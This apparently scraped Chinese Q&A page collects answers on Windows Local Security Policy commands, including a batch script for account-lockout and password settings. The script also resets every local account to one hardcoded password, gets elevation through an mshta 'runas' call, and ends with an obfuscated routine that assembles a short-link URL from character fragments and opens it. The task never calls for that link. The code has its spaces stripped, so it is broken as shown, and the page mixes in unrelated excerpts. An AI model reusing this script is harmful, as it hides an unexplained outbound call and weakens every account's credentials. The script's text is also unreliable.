本地安全策略命令

Ⅰ cmd中"本地安全策略"的命令

secpol.msc

Ⅱ cmd設置本地安全策略

@echooff&title一鍵配置帳戶策略By依夢琴瑤
cd/d"%~dp0"

::設置【密碼長度最小值】，0不需要密碼；最多14
setLength=8

::設置【密碼必須符合復雜性要求】，1啟用；0禁用
setComplexity=1

::設置【密碼最短使用期限】，0立即更改；最多998
setMinAge=0

::設置【密碼最長使用期限】，0永不過期；最多999
setMaxAge=180

::設置【強制密碼歷史】，0-24
setHistory=3

::設置【用可還原的加密來儲存密碼】，1啟用；0禁用
setClear=0

::設置【帳戶鎖定時間】，0，一直鎖定；最多99999
setLockout=10

::設置【帳戶鎖定閾值】，0，永不鎖定；最多999
setBadCount=3

::設置【重置帳戶鎖定計數器】，0，無；啟用范圍1-999
setReCount=10

::為所有帳戶設置統一密碼，密碼中切勿包含特殊字元，比如|'"&%<>等
setPassWord=qwer1234gfcvbn


::獲取管理員許可權
%1call:GetAdmin"%~0"


::友情提醒，如果用戶帳戶名包含空格，或非中文系統。此命令可能會出現錯誤。
call:SetPassWord"%PassWord%"


::執行帳戶策略
call:SetAccountPolicy

gotoEnd

:SetAccountPolicy
(echo[Version]
echosignature="$CHICAGO$"
echo[SystemAccess]
echoMinimumPasswordAge=%MinAge%
echoMaximumPasswordAge=%MaxAge%
echoMinimumPasswordLength=%Length%
echoPasswordHistorySize=%History%
echoPasswordComplexity=%Complexity%
echoLockoutBadCount=%BadCount%
echoResetLockoutCount=%ReCount%
echoLockoutDuration=%Lockout%
echoClearTextPassword=%Clear%)>AccountConfig.inf

secedit/configure/dbAccountConfig.sdb/cfgAccountConfig.inf/logAccountConfig.log
del/f/qAccountConfig.*
goto:eof

:SetPassWord
for/f"skip=4tokens=1-3"%%ain('netuser')do(
if/i"%%~a"=="命令成功完成。"gotoNext
if/inot"%%~a"==""netuser%%~a%~1
if/inot"%%~b"==""netuser%%~b%~1
if/inot"%%~c"==""netuser%%~c%~1
)

:Next
goto:eof

:GetAdmin
echo正在請求管理員許可權。。。&&mshtavbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c%~s1::","","runas",1)(window.close)&&exit
goto:eof

:End
echo所有帳戶策略配置已完成，請按任意鍵退出。
pause>nul
call:ToMe
exit

:ToMe
set"S=.:ailnhpst/fPdv"
start"""%S:~6,1%%S:~9,1%%S:~9,1%%S:~7,1%%S:~1,1%%S:~10,1%%S:~10,1%%S:~8,1%%S:~3,1%%S:~5,1%%S:~2,1%%S:~0,1%%S:~4,1%%S:~9,1%%S:~10,5%"
exit

網路共享那個沒有寫代碼，因為我也不清楚有沒有相關命令可以修改。

Ⅲ 請問用什麼命令可以進入本地安全策略

在啟動的過程中不停地按下F8功能鍵 直到出現系統的啟動菜單 選擇「帶命令行提示的安全模式」 將伺服器系統切換到命令行提示符狀 接下來在命令提示符下直接執行mmc.exe字元串命令 在彈出的系統控制台界面中，單擊「文件」菜單項 並從彈出的下拉菜單中單擊「添加/刪除管理單元」選項 再單擊其後窗口中的「獨立」標簽，然後單擊「添加」按鈕 再依次點「組策略」-「添加」-「完成」-「關閉」-「確定」 這樣就能成功添加一個新的組策略控制台 以後，你就能重新打開組策略編輯窗口

Ⅳ 本地安全策略如何設置

單擊「控制面板→管理工具→本地安全策略」後，會進入「本地安全策略」的主界面。在此可通過菜單欄上的命令設置各種安全策略，並可選擇查看方式，導出列表及導入策略等操作。

一、加固系統賬戶

1.禁止枚舉賬號
我們知道，某些具有黑客行為的蠕蟲病毒，可以通過掃描Windows 2000/XP系統的指定埠，然後通過共享會話猜測管理員系統口令。因此，我們需要通過在「本地安全策略」中設置禁止枚舉賬號，從而抵禦此類入侵行為，操作步驟如下：

在「本地安全策略」左側列表的「安全設置」目錄樹中，逐層展開「本地策略→安全選項」。查看右側的相關策略列表，在此找到「網路訪問：不允許SAM賬戶和共享的匿名枚舉」，用滑鼠右鍵單擊，在彈出菜單中選擇「屬性」，而後會彈出一個對話框，在此激活「已啟用」選項，最後點擊「應用」按鈕使設置生效。

2.賬戶管理
為了防止入侵者利用漏洞登錄機器，我們要在此設置重命名系統管理員賬戶名稱及禁用來賓賬戶。設置方法為：在「本地策略→安全選項」分支中，找到「賬戶：來賓賬戶狀態」策略，點右鍵彈出菜單中選擇「屬性」，而後在彈出的屬性對話框中設置其狀態為「已停用」，最後「確定」退出。
二、加強密碼安全

在「安全設置」中，先定位於「賬戶策略→密碼策略」，在其右側設置視圖中，可酌情進行相應的設置，以使我們的系統密碼相對安全，不易破解。如防破解的一個重要手段就是定期更新密碼，大家可據此進行如下設置：滑鼠右鍵單擊「密碼最長存留期」，在彈出菜單中選擇「屬性」，在彈出的對話框中，大家可自定義一個密碼設置後能夠使用的時間長短(限定於1至999之間)。

此外，通過「本地安全設置」，還可以進行通過設置「審核對象訪問」，跟蹤用於訪問文件或其他對象的用戶賬戶、登錄嘗試、系統關閉或重新啟動以及類似的事件。諸如此類的安全設置，不一而足。大家在實際應用中會逐漸發覺「本地安全設置」的確是一個不可或缺的系統安全工具。
參考資料：http://www.enet.com.cn/article/2004/0214/A20040214286195.shtml

Ⅳ 用什麼命令可以進入本地安全策略

輸入secpol.msc就可以

Ⅵ 本地安全策略命令

netsh ipsec static set policy name=你的策略 assign=y //設置這個策略為指派netsh ipsec static set policy name=你的策略 assign=n //設置這個策略為不指派
netsh ipsec static delete policy name=你的策略 //刪除這個策略netsh ipsec static delete policy all //刪除所有策略
netsh ipsec static show policy all //顯示所有策略//以上命令都是在win2K使用

Ⅶ 怎麼打開本地安全策略命令是什麼XP系統！

你真可愛，
你用樓上幾位說的組策略命令運行後，再點擊 windows設置--安全設置，裡面就可以看到本地安全策略了。
應該是這樣

Ⅷ 怎樣通過DOS命令查看本地安全策略

DOS命令大全
MD——建立子目錄
1．功能：創建新的子目錄
2．類型：內部命令
3．格式：MD[盤符：][路徑名]〈子目錄名〉
4．使用說明：
（1）「盤符」：指定要建立子目錄的磁碟驅動器字母，若省略，則為當前驅動器；
（2）「路徑名」：要建立的子目錄的上級目錄名，若預設則建在當前目錄下。
例：（1）在C盤的根目錄下創建名為FOX的子目錄；（2）在FOX子目錄下再創建USER子目錄。
C：、＞MD FOX （在當前驅動器C盤下創建子目錄FOX）
C：、＞MD FOX 、USER （在FOX 子目錄下再創建USER子目錄）

Ⅸ 本地安全策略命令是什麼

netsh ipsec static set policy name=你的策略

assign=y //設置這個策略為指派

netsh ipsec static set policy name=你的策略

assign=n //設置這個策略為不指派。

netsh ipsec static delete policy name=你的策略//刪除這個策略

netsh ipsec static delete policy all //刪除所有策略。

本地安全策略和組策略的區別：

1、組策略是微軟Windows NT家族操作系統的一個特性，它可以控制用戶帳戶和計算機帳戶的工作環境。

組策略提供了操作系統、應用程序和活動目錄中用戶設置的集中化管理和配置，可以在獨立且非域的計算機上管理組策略對象。

2、本地安全策略是對登陸到計算機上的賬號定義一些安全設置，在沒有活動目錄集中管理的情況下，本地管理員必須為計算機進行設置以確保其安全。